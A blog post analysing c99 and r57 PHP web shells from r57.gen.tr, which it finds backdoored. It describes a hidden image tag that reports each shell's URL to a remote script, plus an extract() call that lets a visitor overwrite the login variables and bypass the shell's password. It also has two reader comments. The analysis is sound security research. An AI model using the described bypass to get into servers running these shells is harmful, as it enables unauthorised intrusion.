Hacking Script Kiddies, r57.gen.tr Shells Are Backdoored in a Way You Might Not Guess

TL;DR all shells from http://www.r57.gen.tr/ are backdoored, shockingly. But in a pretty clever way you probably didn’t expect.

You know sometimes when I find things in security that are probably unethical, I’m more impressed than morally distressed.

I decided to poke around some of the online sources for the typical shells (c99, r57, etc) and after a quick search:

Selection_001

I’ve got all the shells I’d ever need!

Or do I? Let’s check out this first site shall we?

Selection_002

Selection_003

C99 is probably the more famous one, so let’s take a look at it!

Now immediately everyone’s first thought is to check the PHP itself for clever backdoors. After all, this is a backdoor shell so why wouldn’t it be a backdoored backdoor shell (bleh).

But notice this section:

Hmm, what’s the source for that page?

Selection_006

Ho-ho-ho that’s a little suspicious, so it’s making an image with the source being http://www.r57.gen.tr/yaz/yaz.php?a= plus our current URL?

Naughty naughty, navigating to this URL we find:
Selection_005

Oh a blank page, that’s probably nothing at all!

Or…just maybe…they are capturing IP addresses to alert the website owners or steal the shells for themselves (far more likely).

I’m willing to bet there is a PHP auth-bypass in the code as well…

Auth Bypass Exploit

Notice this piece of code here:
Selection_009

Found this after diffing this c99 shell against other online copies. For those not familiar, extract() is a VERY dangerous command to use. Basically you pass it an array and it extracts the values into variables.

This example from the official PHP site says it all:

Guess what is right after that line?

Selection_010

So one could very easily over right $login, $md5_pass, etc to override the login.

EDIT: This same JS link is in all of the shells on the site. See r57.php:

The moral of this lesson is obvious but I’m more entertained by the fact that they went with a JS backdoor. Who would check the Javascript for backdoors? It’s the perfect crime!

The domain is apparently Turkish and has been registered for sometime, so I can’t imagine the amount of bad shells have been distributed.

But let’s be honest, somebody has to have noticed this right…?
Selection_008

Or maybe nobody actually falls for this…?
*facepalm*

Which isn’t even the source but copied from http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson11/

For archiving reasons I’ll keep the source here to show the *current* backdoor in case it’s changed: http://pastebin.com/LCDrr0e8

EDIT: I now have a moral dilemma because I’m sure people will abuse this exploit to break into more sites…Hmm…

9 comments

  1. Hey man, just have to say that I love your blog. Spent a whole hour reading your archives, great stuff, keep it up! Reminds me of why I got into this stuff in the first place.

  2. what? you really who would question checking the js for a backdoor? it is actually the most common way this is done. however its pretty easy to check if youre using a compact php shell, can simply step through code, ctrl+f for , and look for any obfuscated sections of code within shell (should be obvious)

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">